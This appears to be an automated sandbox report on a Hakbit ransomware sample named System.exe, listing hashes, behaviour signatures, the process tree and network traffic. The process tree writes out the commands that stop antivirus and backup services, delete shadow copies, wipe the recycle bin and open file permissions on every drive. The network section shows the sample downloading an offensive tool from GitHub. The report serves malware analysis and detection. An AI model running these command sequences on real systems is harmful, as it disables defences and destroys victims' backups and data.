Resubmissions

17-11-2020 12:01

201117-yzjn4s5cdn 10

18-06-2020 04:28

200618-tg948yvz5n 10

Analysis

  • max time kernel
    139s
  • max time network
    97s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    18-06-2020 04:28

General

  • Target

    System.exe

  • Size

    66KB

  • MD5

    8d6ab03994b0ce3466873aa7532fe76b

  • SHA1

    156aecd4d8e65d205181ad5eace466c8798d3c86

  • SHA256

    e5242266d9fc1e27e583a920ff6b9ff445c0942793ed80a92d5c5b6792d25f62

  • SHA512

    2c1df9fb201b4a750378dfa7029755239167efa51ae4ddc9c5042218a1d01c3bf5557c09faeda4f3f68818082a6f95526d5776d432b5b6774ae2c1c90dc7a84c

Malware Config

Signatures

  • Suspicious use of WriteProcessMemory 390 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Drops startup file 1 IoCs
  • Modifies WinLogon 2 TTPs 2 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Hakbit

    Ransomware which encrypts files using AES, first seen in November 2019.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Modifies file permissions 1 TTPs 29 IoCs
  • Runs net.exe
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Deletes itself 1 IoCs
  • Interacts with shadow copies 2 TTPs 14 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 3 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies service 2 TTPs 5 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\System.exe
    "C:\Users\Admin\AppData\Local\Temp\System.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    • Suspicious use of SendNotifyMessage
    • Drops startup file
    • Modifies WinLogon
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of AdjustPrivilegeToken
    PID:1312
    • C:\Windows\system32\net.exe
      "net.exe" stop avpsus /y
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1480
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop avpsus /y
        3⤵
          PID:544
      • C:\Windows\system32\net.exe
        "net.exe" stop McAfeeDLPAgentService /y
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1012
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
          3⤵
            PID:1612
        • C:\Windows\system32\net.exe
          "net.exe" stop mfewc /y
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:240
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 stop mfewc /y
            3⤵
              PID:1068
          • C:\Windows\system32\net.exe
            "net.exe" stop BMR Boot Service /y
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:1088
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 stop BMR Boot Service /y
              3⤵
                PID:1520
            • C:\Windows\system32\net.exe
              "net.exe" stop NetBackup BMR MTFTP Service /y
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:1668
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
                3⤵
                  PID:1360
              • C:\Windows\system32\net.exe
                "net.exe" stop DefWatch /y
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:1764
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 stop DefWatch /y
                  3⤵
                    PID:1824
                • C:\Windows\system32\net.exe
                  "net.exe" stop ccEvtMgr /y
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1836
                  • C:\Windows\system32\net1.exe
                    C:\Windows\system32\net1 stop ccEvtMgr /y
                    3⤵
                      PID:1844
                  • C:\Windows\system32\net.exe
                    "net.exe" stop ccSetMgr /y
                    2⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1788
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 stop ccSetMgr /y
                      3⤵
                        PID:1768
                    • C:\Windows\system32\net.exe
                      "net.exe" stop SavRoam /y
                      2⤵
                      • Suspicious use of WriteProcessMemory
                      PID:652
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 stop SavRoam /y
                        3⤵
                          PID:864
                      • C:\Windows\system32\net.exe
                        "net.exe" stop RTVscan /y
                        2⤵
                        • Suspicious use of WriteProcessMemory
                        PID:984
                        • C:\Windows\system32\net1.exe
                          C:\Windows\system32\net1 stop RTVscan /y
                          3⤵
                            PID:616
                        • C:\Windows\system32\net.exe
                          "net.exe" stop QBFCService /y
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:1316
                          • C:\Windows\system32\net1.exe
                            C:\Windows\system32\net1 stop QBFCService /y
                            3⤵
                              PID:1624
                          • C:\Windows\system32\net.exe
                            "net.exe" stop QBIDPService /y
                            2⤵
                              PID:1592
                              • C:\Windows\system32\net1.exe
                                C:\Windows\system32\net1 stop QBIDPService /y
                                3⤵
                                  PID:1636
                              • C:\Windows\system32\net.exe
                                "net.exe" stop Intuit.QuickBooks.FCS /y
                                2⤵
                                  PID:1620
                                  • C:\Windows\system32\net1.exe
                                    C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
                                    3⤵
                                      PID:1896
                                  • C:\Windows\system32\net.exe
                                    "net.exe" stop QBCFMonitorService /y
                                    2⤵
                                      PID:1948
                                      • C:\Windows\system32\net1.exe
                                        C:\Windows\system32\net1 stop QBCFMonitorService /y
                                        3⤵
                                          PID:1888
                                      • C:\Windows\system32\net.exe
                                        "net.exe" stop YooBackup /y
                                        2⤵
                                          PID:1892
                                          • C:\Windows\system32\net1.exe
                                            C:\Windows\system32\net1 stop YooBackup /y
                                            3⤵
                                              PID:1968
                                          • C:\Windows\system32\net.exe
                                            "net.exe" stop YooIT /y
                                            2⤵
                                              PID:1980
                                              • C:\Windows\system32\net1.exe
                                                C:\Windows\system32\net1 stop YooIT /y
                                                3⤵
                                                  PID:2028
                                              • C:\Windows\system32\net.exe
                                                "net.exe" stop zhudongfangyu /y
                                                2⤵
                                                  PID:856
                                                  • C:\Windows\system32\net1.exe
                                                    C:\Windows\system32\net1 stop zhudongfangyu /y
                                                    3⤵
                                                      PID:1200
                                                  • C:\Windows\system32\net.exe
                                                    "net.exe" stop stc_raw_agent /y
                                                    2⤵
                                                      PID:1104
                                                      • C:\Windows\system32\net1.exe
                                                        C:\Windows\system32\net1 stop stc_raw_agent /y
                                                        3⤵
                                                          PID:1484
                                                      • C:\Windows\system32\net.exe
                                                        "net.exe" stop VSNAPVSS /y
                                                        2⤵
                                                          PID:1492
                                                          • C:\Windows\system32\net1.exe
                                                            C:\Windows\system32\net1 stop VSNAPVSS /y
                                                            3⤵
                                                              PID:1572
                                                          • C:\Windows\system32\net.exe
                                                            "net.exe" stop VeeamTransportSvc /y
                                                            2⤵
                                                              PID:836
                                                              • C:\Windows\system32\net1.exe
                                                                C:\Windows\system32\net1 stop VeeamTransportSvc /y
                                                                3⤵
                                                                  PID:1612
                                                              • C:\Windows\system32\net.exe
                                                                "net.exe" stop VeeamDeploymentService /y
                                                                2⤵
                                                                  PID:848
                                                                  • C:\Windows\system32\net1.exe
                                                                    C:\Windows\system32\net1 stop VeeamDeploymentService /y
                                                                    3⤵
                                                                      PID:324
                                                                  • C:\Windows\system32\net.exe
                                                                    "net.exe" stop VeeamNFSSvc /y
                                                                    2⤵
                                                                      PID:1064
                                                                      • C:\Windows\system32\net1.exe
                                                                        C:\Windows\system32\net1 stop VeeamNFSSvc /y
                                                                        3⤵
                                                                          PID:1524
                                                                      • C:\Windows\system32\net.exe
                                                                        "net.exe" stop veeam /y
                                                                        2⤵
                                                                          PID:1376
                                                                          • C:\Windows\system32\net1.exe
                                                                            C:\Windows\system32\net1 stop veeam /y
                                                                            3⤵
                                                                              PID:1380
                                                                          • C:\Windows\system32\net.exe
                                                                            "net.exe" stop PDVFSService /y
                                                                            2⤵
                                                                              PID:1816
                                                                              • C:\Windows\system32\net1.exe
                                                                                C:\Windows\system32\net1 stop PDVFSService /y
                                                                                3⤵
                                                                                  PID:1828
                                                                              • C:\Windows\system32\net.exe
                                                                                "net.exe" stop BackupExecVSSProvider /y
                                                                                2⤵
                                                                                  PID:1792
                                                                                  • C:\Windows\system32\net1.exe
                                                                                    C:\Windows\system32\net1 stop BackupExecVSSProvider /y
                                                                                    3⤵
                                                                                      PID:1784
                                                                                  • C:\Windows\system32\net.exe
                                                                                    "net.exe" stop BackupExecAgentAccelerator /y
                                                                                    2⤵
                                                                                      PID:1768
                                                                                      • C:\Windows\system32\net1.exe
                                                                                        C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
                                                                                        3⤵
                                                                                          PID:568
                                                                                      • C:\Windows\system32\net.exe
                                                                                        "net.exe" stop BackupExecAgentBrowser /y
                                                                                        2⤵
                                                                                          PID:368
                                                                                          • C:\Windows\system32\net1.exe
                                                                                            C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
                                                                                            3⤵
                                                                                              PID:1516
                                                                                          • C:\Windows\system32\net.exe
                                                                                            "net.exe" stop BackupExecDiveciMediaService /y
                                                                                            2⤵
                                                                                              PID:300
                                                                                              • C:\Windows\system32\net1.exe
                                                                                                C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
                                                                                                3⤵
                                                                                                  PID:1624
                                                                                              • C:\Windows\system32\net.exe
                                                                                                "net.exe" stop BackupExecJobEngine /y
                                                                                                2⤵
                                                                                                  PID:1256
                                                                                                  • C:\Windows\system32\net1.exe
                                                                                                    C:\Windows\system32\net1 stop BackupExecJobEngine /y
                                                                                                    3⤵
                                                                                                      PID:1600
                                                                                                  • C:\Windows\system32\net.exe
                                                                                                    "net.exe" stop BackupExecManagementService /y
                                                                                                    2⤵
                                                                                                      PID:1564
                                                                                                      • C:\Windows\system32\net1.exe
                                                                                                        C:\Windows\system32\net1 stop BackupExecManagementService /y
                                                                                                        3⤵
                                                                                                          PID:1568
                                                                                                      • C:\Windows\system32\net.exe
                                                                                                        "net.exe" stop BackupExecRPCService /y
                                                                                                        2⤵
                                                                                                          PID:1908
                                                                                                          • C:\Windows\system32\net1.exe
                                                                                                            C:\Windows\system32\net1 stop BackupExecRPCService /y
                                                                                                            3⤵
                                                                                                              PID:1900
                                                                                                          • C:\Windows\system32\net.exe
                                                                                                            "net.exe" stop AcrSch2Svc /y
                                                                                                            2⤵
                                                                                                              PID:1984
                                                                                                              • C:\Windows\system32\net1.exe
                                                                                                                C:\Windows\system32\net1 stop AcrSch2Svc /y
                                                                                                                3⤵
                                                                                                                  PID:1972
                                                                                                              • C:\Windows\system32\net.exe
                                                                                                                "net.exe" stop AcronisAgent /y
                                                                                                                2⤵
                                                                                                                  PID:2032
                                                                                                                  • C:\Windows\system32\net1.exe
                                                                                                                    C:\Windows\system32\net1 stop AcronisAgent /y
                                                                                                                    3⤵
                                                                                                                      PID:1100
                                                                                                                  • C:\Windows\system32\net.exe
                                                                                                                    "net.exe" stop CASAD2DWebSvc /y
                                                                                                                    2⤵
                                                                                                                      PID:1200
                                                                                                                      • C:\Windows\system32\net1.exe
                                                                                                                        C:\Windows\system32\net1 stop CASAD2DWebSvc /y
                                                                                                                        3⤵
                                                                                                                          PID:1488
                                                                                                                      • C:\Windows\system32\net.exe
                                                                                                                        "net.exe" stop CAARCUpdateSvc /y
                                                                                                                        2⤵
                                                                                                                          PID:1084
                                                                                                                          • C:\Windows\system32\net1.exe
                                                                                                                            C:\Windows\system32\net1 stop CAARCUpdateSvc /y
                                                                                                                            3⤵
                                                                                                                              PID:544
                                                                                                                          • C:\Windows\system32\net.exe
                                                                                                                            "net.exe" stop sophos /y
                                                                                                                            2⤵
                                                                                                                              PID:1060
                                                                                                                              • C:\Windows\system32\net1.exe
                                                                                                                                C:\Windows\system32\net1 stop sophos /y
                                                                                                                                3⤵
                                                                                                                                  PID:1612
                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                "sc.exe" config SQLTELEMETRY start= disabled
                                                                                                                                2⤵
                                                                                                                                  PID:1616
                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
                                                                                                                                  2⤵
                                                                                                                                    PID:1068
                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                    "sc.exe" config SQLWriter start= disabled
                                                                                                                                    2⤵
                                                                                                                                      PID:1092
                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                      "sc.exe" config SstpSvc start= disabled
                                                                                                                                      2⤵
                                                                                                                                        PID:1380
                                                                                                                                      • C:\Windows\system32\taskkill.exe
                                                                                                                                        "taskkill.exe" /IM mspub.exe /F
                                                                                                                                        2⤵
                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                        • Kills process with taskkill
                                                                                                                                        PID:1852
                                                                                                                                      • C:\Windows\system32\taskkill.exe
                                                                                                                                        "taskkill.exe" /IM mydesktopqos.exe /F
                                                                                                                                        2⤵
                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                        • Kills process with taskkill
                                                                                                                                        PID:1324
                                                                                                                                      • C:\Windows\system32\taskkill.exe
                                                                                                                                        "taskkill.exe" /IM mydesktopservice.exe /F
                                                                                                                                        2⤵
                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                        • Kills process with taskkill
                                                                                                                                        PID:1000
                                                                                                                                      • C:\Windows\system32\vssadmin.exe
                                                                                                                                        "vssadmin.exe" Delete Shadows /all /quiet
                                                                                                                                        2⤵
                                                                                                                                        • Interacts with shadow copies
                                                                                                                                        PID:1936
                                                                                                                                      • C:\Windows\system32\vssadmin.exe
                                                                                                                                        "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
                                                                                                                                        2⤵
                                                                                                                                        • Interacts with shadow copies
                                                                                                                                        PID:1116
                                                                                                                                      • C:\Windows\system32\vssadmin.exe
                                                                                                                                        "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
                                                                                                                                        2⤵
                                                                                                                                        • Interacts with shadow copies
                                                                                                                                        PID:780
                                                                                                                                      • C:\Windows\system32\vssadmin.exe
                                                                                                                                        "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
                                                                                                                                        2⤵
                                                                                                                                        • Interacts with shadow copies
                                                                                                                                        PID:744
                                                                                                                                      • C:\Windows\system32\vssadmin.exe
                                                                                                                                        "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
                                                                                                                                        2⤵
                                                                                                                                        • Interacts with shadow copies
                                                                                                                                        PID:1212
                                                                                                                                      • C:\Windows\system32\vssadmin.exe
                                                                                                                                        "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
                                                                                                                                        2⤵
                                                                                                                                        • Interacts with shadow copies
                                                                                                                                        PID:520
                                                                                                                                      • C:\Windows\system32\vssadmin.exe
                                                                                                                                        "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
                                                                                                                                        2⤵
                                                                                                                                        • Interacts with shadow copies
                                                                                                                                        PID:1624
                                                                                                                                      • C:\Windows\system32\vssadmin.exe
                                                                                                                                        "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
                                                                                                                                        2⤵
                                                                                                                                        • Interacts with shadow copies
                                                                                                                                        PID:1632
                                                                                                                                      • C:\Windows\system32\vssadmin.exe
                                                                                                                                        "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
                                                                                                                                        2⤵
                                                                                                                                        • Interacts with shadow copies
                                                                                                                                        PID:2028
                                                                                                                                      • C:\Windows\system32\vssadmin.exe
                                                                                                                                        "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
                                                                                                                                        2⤵
                                                                                                                                        • Interacts with shadow copies
                                                                                                                                        PID:212
                                                                                                                                      • C:\Windows\system32\vssadmin.exe
                                                                                                                                        "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
                                                                                                                                        2⤵
                                                                                                                                        • Interacts with shadow copies
                                                                                                                                        PID:1556
                                                                                                                                      • C:\Windows\system32\vssadmin.exe
                                                                                                                                        "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
                                                                                                                                        2⤵
                                                                                                                                        • Interacts with shadow copies
                                                                                                                                        PID:1044
                                                                                                                                      • C:\Windows\system32\vssadmin.exe
                                                                                                                                        "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
                                                                                                                                        2⤵
                                                                                                                                        • Interacts with shadow copies
                                                                                                                                        PID:1508
                                                                                                                                      • C:\Windows\system32\vssadmin.exe
                                                                                                                                        "vssadmin.exe" Delete Shadows /all /quiet
                                                                                                                                        2⤵
                                                                                                                                        • Interacts with shadow copies
                                                                                                                                        PID:1524
                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                        "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
                                                                                                                                        2⤵
                                                                                                                                          PID:1848
                                                                                                                                        • C:\Windows\system32\arp.exe
                                                                                                                                          "arp" -a
                                                                                                                                          2⤵
                                                                                                                                            PID:1600
                                                                                                                                          • C:\Windows\system32\icacls.exe
                                                                                                                                            "icacls.exe" A:\* /grant Everyone:F /T /C /Q
                                                                                                                                            2⤵
                                                                                                                                            • Modifies file permissions
                                                                                                                                            PID:608
                                                                                                                                          • C:\Windows\system32\icacls.exe
                                                                                                                                            "icacls.exe" B:\* /grant Everyone:F /T /C /Q
                                                                                                                                            2⤵
                                                                                                                                            • Modifies file permissions
                                                                                                                                            PID:236
                                                                                                                                          • C:\Windows\system32\icacls.exe
                                                                                                                                            "icacls.exe" D:\* /grant Everyone:F /T /C /Q
                                                                                                                                            2⤵
                                                                                                                                            • Modifies file permissions
                                                                                                                                            PID:1040
                                                                                                                                          • C:\Windows\system32\icacls.exe
                                                                                                                                            "icacls.exe" E:\* /grant Everyone:F /T /C /Q
                                                                                                                                            2⤵
                                                                                                                                            • Modifies file permissions
                                                                                                                                            PID:872
                                                                                                                                          • C:\Windows\system32\icacls.exe
                                                                                                                                            "icacls.exe" F:\* /grant Everyone:F /T /C /Q
                                                                                                                                            2⤵
                                                                                                                                            • Modifies file permissions
                                                                                                                                            PID:1612
                                                                                                                                          • C:\Windows\system32\icacls.exe
                                                                                                                                            "icacls.exe" G:\* /grant Everyone:F /T /C /Q
                                                                                                                                            2⤵
                                                                                                                                            • Modifies file permissions
                                                                                                                                            PID:1504
                                                                                                                                          • C:\Windows\system32\icacls.exe
                                                                                                                                            "icacls.exe" H:\* /grant Everyone:F /T /C /Q
                                                                                                                                            2⤵
                                                                                                                                            • Modifies file permissions
                                                                                                                                            PID:1804
                                                                                                                                          • C:\Windows\system32\icacls.exe
                                                                                                                                            "icacls.exe" I:\* /grant Everyone:F /T /C /Q
                                                                                                                                            2⤵
                                                                                                                                            • Modifies file permissions
                                                                                                                                            PID:1828
                                                                                                                                          • C:\Windows\system32\icacls.exe
                                                                                                                                            "icacls.exe" J:\* /grant Everyone:F /T /C /Q
                                                                                                                                            2⤵
                                                                                                                                            • Modifies file permissions
                                                                                                                                            PID:1932
                                                                                                                                          • C:\Windows\system32\icacls.exe
                                                                                                                                            "icacls.exe" K:\* /grant Everyone:F /T /C /Q
                                                                                                                                            2⤵
                                                                                                                                            • Modifies file permissions
                                                                                                                                            PID:216
                                                                                                                                          • C:\Windows\system32\icacls.exe
                                                                                                                                            "icacls.exe" L:\* /grant Everyone:F /T /C /Q
                                                                                                                                            2⤵
                                                                                                                                            • Modifies file permissions
                                                                                                                                            PID:1560
                                                                                                                                          • C:\Windows\system32\icacls.exe
                                                                                                                                            "icacls.exe" M:\* /grant Everyone:F /T /C /Q
                                                                                                                                            2⤵
                                                                                                                                            • Modifies file permissions
                                                                                                                                            PID:748
                                                                                                                                          • C:\Windows\system32\icacls.exe
                                                                                                                                            "icacls.exe" N:\* /grant Everyone:F /T /C /Q
                                                                                                                                            2⤵
                                                                                                                                            • Modifies file permissions
                                                                                                                                            PID:1080
                                                                                                                                          • C:\Windows\system32\icacls.exe
                                                                                                                                            "icacls.exe" O:\* /grant Everyone:F /T /C /Q
                                                                                                                                            2⤵
                                                                                                                                            • Modifies file permissions
                                                                                                                                            PID:1516
                                                                                                                                          • C:\Windows\system32\icacls.exe
                                                                                                                                            "icacls.exe" P:\* /grant Everyone:F /T /C /Q
                                                                                                                                            2⤵
                                                                                                                                            • Modifies file permissions
                                                                                                                                            PID:1056
                                                                                                                                          • C:\Windows\system32\icacls.exe
                                                                                                                                            "icacls.exe" Q:\* /grant Everyone:F /T /C /Q
                                                                                                                                            2⤵
                                                                                                                                            • Modifies file permissions
                                                                                                                                            PID:1544
                                                                                                                                          • C:\Windows\system32\icacls.exe
                                                                                                                                            "icacls.exe" R:\* /grant Everyone:F /T /C /Q
                                                                                                                                            2⤵
                                                                                                                                            • Modifies file permissions
                                                                                                                                            PID:544
                                                                                                                                          • C:\Windows\system32\icacls.exe
                                                                                                                                            "icacls.exe" S:\* /grant Everyone:F /T /C /Q
                                                                                                                                            2⤵
                                                                                                                                            • Modifies file permissions
                                                                                                                                            PID:1696
                                                                                                                                          • C:\Windows\system32\icacls.exe
                                                                                                                                            "icacls.exe" T:\* /grant Everyone:F /T /C /Q
                                                                                                                                            2⤵
                                                                                                                                            • Modifies file permissions
                                                                                                                                            PID:1292
                                                                                                                                          • C:\Windows\system32\icacls.exe
                                                                                                                                            "icacls.exe" U:\* /grant Everyone:F /T /C /Q
                                                                                                                                            2⤵
                                                                                                                                            • Modifies file permissions
                                                                                                                                            PID:632
                                                                                                                                          • C:\Windows\system32\icacls.exe
                                                                                                                                            "icacls.exe" V:\* /grant Everyone:F /T /C /Q
                                                                                                                                            2⤵
                                                                                                                                            • Modifies file permissions
                                                                                                                                            PID:1108
                                                                                                                                          • C:\Windows\system32\icacls.exe
                                                                                                                                            "icacls.exe" W:\* /grant Everyone:F /T /C /Q
                                                                                                                                            2⤵
                                                                                                                                            • Modifies file permissions
                                                                                                                                            PID:1824
                                                                                                                                          • C:\Windows\system32\icacls.exe
                                                                                                                                            "icacls.exe" X:\* /grant Everyone:F /T /C /Q
                                                                                                                                            2⤵
                                                                                                                                            • Modifies file permissions
                                                                                                                                            PID:1308
                                                                                                                                          • C:\Windows\system32\icacls.exe
                                                                                                                                            "icacls.exe" Y:\* /grant Everyone:F /T /C /Q
                                                                                                                                            2⤵
                                                                                                                                            • Modifies file permissions
                                                                                                                                            PID:232
                                                                                                                                          • C:\Windows\system32\icacls.exe
                                                                                                                                            "icacls.exe" Z:\* /grant Everyone:F /T /C /Q
                                                                                                                                            2⤵
                                                                                                                                            • Modifies file permissions
                                                                                                                                            PID:1208
                                                                                                                                          • C:\Windows\system32\icacls.exe
                                                                                                                                            "icacls.exe" C:\Users\Admin\Desktop\* /grant Everyone:F /T /C /Q
                                                                                                                                            2⤵
                                                                                                                                            • Modifies file permissions
                                                                                                                                            PID:1008
                                                                                                                                          • C:\Windows\system32\icacls.exe
                                                                                                                                            "icacls.exe" C:\Users\Admin\Documents\* /grant Everyone:F /T /C /Q
                                                                                                                                            2⤵
                                                                                                                                            • Modifies file permissions
                                                                                                                                            PID:1104
                                                                                                                                          • C:\Windows\system32\icacls.exe
                                                                                                                                            "icacls.exe" C:\Users\Admin\Pictures\* /grant Everyone:F /T /C /Q
                                                                                                                                            2⤵
                                                                                                                                            • Modifies file permissions
                                                                                                                                            PID:872
                                                                                                                                          • C:\Windows\system32\icacls.exe
                                                                                                                                            "icacls.exe" C:\Users\Admin\* /grant Everyone:F /T /C /Q
                                                                                                                                            2⤵
                                                                                                                                            • Modifies file permissions
                                                                                                                                            PID:324
                                                                                                                                          • C:\Windows\System32\notepad.exe
                                                                                                                                            "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HELP_ME_RECOVER_MY_FILES.txt
                                                                                                                                            2⤵
                                                                                                                                            • Opens file in notepad (likely ransom note)
                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                            PID:1292
                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                            "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
                                                                                                                                            2⤵
                                                                                                                                              PID:364
                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                ping 127.0.0.7 -n 3
                                                                                                                                                3⤵
                                                                                                                                                • Runs ping.exe
                                                                                                                                                PID:1104
                                                                                                                                              • C:\Windows\system32\fsutil.exe
                                                                                                                                                fsutil file setZeroData offset=0 length=524288 “%s”
                                                                                                                                                3⤵
                                                                                                                                                  PID:1576
                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\System.exe
                                                                                                                                                2⤵
                                                                                                                                                • Deletes itself
                                                                                                                                                PID:324
                                                                                                                                                • C:\Windows\system32\choice.exe
                                                                                                                                                  choice /C Y /N /D Y /T 3
                                                                                                                                                  3⤵
                                                                                                                                                    PID:2012
                                                                                                                                              • C:\Windows\system32\vssvc.exe
                                                                                                                                                C:\Windows\system32\vssvc.exe
                                                                                                                                                1⤵
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                • Modifies service
                                                                                                                                                PID:2004
                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                "C:\Windows\explorer.exe"
                                                                                                                                                1⤵
                                                                                                                                                  PID:1764
                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                  "C:\Windows\explorer.exe"
                                                                                                                                                  1⤵
                                                                                                                                                    PID:1896

                                                                                                                                                  Network

                                                                                                                                                  • flag-unknown
                                                                                                                                                    DNS
                                                                                                                                                    www.google.com
                                                                                                                                                    Remote address:
                                                                                                                                                    8.8.8.8:53
                                                                                                                                                    Request
                                                                                                                                                    www.google.com
                                                                                                                                                    IN A
                                                                                                                                                    Response
                                                                                                                                                    www.google.com
                                                                                                                                                    IN A
                                                                                                                                                    172.217.168.196
                                                                                                                                                  • flag-unknown
                                                                                                                                                    GET
                                                                                                                                                    https://www.google.com/
                                                                                                                                                    System.exe
                                                                                                                                                    Remote address:
                                                                                                                                                    172.217.168.196:443
                                                                                                                                                    Request
                                                                                                                                                    GET / HTTP/1.1
                                                                                                                                                    Host: www.google.com
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Response
                                                                                                                                                    HTTP/1.1 200 OK
                                                                                                                                                    Date: Thu, 18 Jun 2020 04:28:28 GMT
                                                                                                                                                    Expires: -1
                                                                                                                                                    Cache-Control: private, max-age=0
                                                                                                                                                    Content-Type: text/html; charset=ISO-8859-1
                                                                                                                                                    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                    Server: gws
                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    Set-Cookie: 1P_JAR=2020-06-18-04; expires=Sat, 18-Jul-2020 04:28:28 GMT; path=/; domain=.google.com; Secure
                                                                                                                                                    Set-Cookie: NID=204=lkSGaelz_W94W5dxgyTcPERbkrypR39V5aOmj-1_5TucLSrZoaqwBxcW5q8cdl1nUH4_8g5sWMzO5JJeAKgYqP35VeAZvAM1PfGYwO4UgIreA9lRPARh8avC0REFHY1-Mvo3CGKSe9o9y5tWOxxQr2Wuu3slnq7zpatIbu8UwDk; expires=Fri, 18-Dec-2020 04:28:28 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                    Alt-Svc: h3-28=":443"; ma=2592000,h3-27=":443"; ma=2592000,h3-25=":443"; ma=2592000,h3-T050=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q049=":443"; ma=2592000,h3-Q048=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                    Accept-Ranges: none
                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                  • flag-unknown
                                                                                                                                                    DNS
                                                                                                                                                    raw.githubusercontent.com
                                                                                                                                                    Remote address:
                                                                                                                                                    8.8.8.8:53
                                                                                                                                                    Request
                                                                                                                                                    raw.githubusercontent.com
                                                                                                                                                    IN A
                                                                                                                                                    Response
                                                                                                                                                    raw.githubusercontent.com
                                                                                                                                                    IN CNAME
                                                                                                                                                    github.map.fastly.net
                                                                                                                                                    github.map.fastly.net
                                                                                                                                                    IN A
                                                                                                                                                    151.101.0.133
                                                                                                                                                    github.map.fastly.net
                                                                                                                                                    IN A
                                                                                                                                                    151.101.64.133
                                                                                                                                                    github.map.fastly.net
                                                                                                                                                    IN A
                                                                                                                                                    151.101.128.133
                                                                                                                                                    github.map.fastly.net
                                                                                                                                                    IN A
                                                                                                                                                    151.101.192.133
                                                                                                                                                  • flag-unknown
                                                                                                                                                    GET
                                                                                                                                                    https://raw.githubusercontent.com/anthemtotheego/SharpExec/master/CompiledBinaries/SharpExec_x64.exe
                                                                                                                                                    System.exe
                                                                                                                                                    Remote address:
                                                                                                                                                    151.101.0.133:443
                                                                                                                                                    Request
                                                                                                                                                    GET /anthemtotheego/SharpExec/master/CompiledBinaries/SharpExec_x64.exe HTTP/1.1
                                                                                                                                                    Host: raw.githubusercontent.com
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Response
